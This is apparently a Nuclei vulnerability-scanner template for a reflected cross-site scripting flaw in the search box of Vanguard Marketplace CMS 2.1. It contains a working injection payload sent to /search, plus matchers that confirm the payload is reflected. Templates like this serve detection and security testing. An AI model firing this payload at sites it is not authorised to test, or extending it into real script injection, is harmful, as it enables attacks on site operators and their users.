id: vanguard-post-xss

info:
  name: Vanguard Marketplace CMS 2.1 - Cross-Site Scripting
  author: ImNightmaree
  severity: high
  description: Vanguard Marketplace CMS 2.1 contains a cross-site scripting vulnerability in the message and product title tags and in the product search box.
  reference:
    - https://packetstormsecurity.com/files/157099/Vanguard-2.1-Cross-Site-Scripting.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
  tags: vanguard,xss,packetstorm

http:
  - raw:
      - |
        POST /search HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        phps_query=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "</script><script>alert(document.domain)</script>"
        part: body

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# digest: 4a0a004730450221008b20957b8233ef40cba39cbd0306d6c48515750b1240177330ee6fd8a4804f6a02205c0f243356cadf4cf8da4dc5cc5c137df10c1d931bc1671cf1319d64f8584c77:922c64590222798bb761d5b6d8e72950
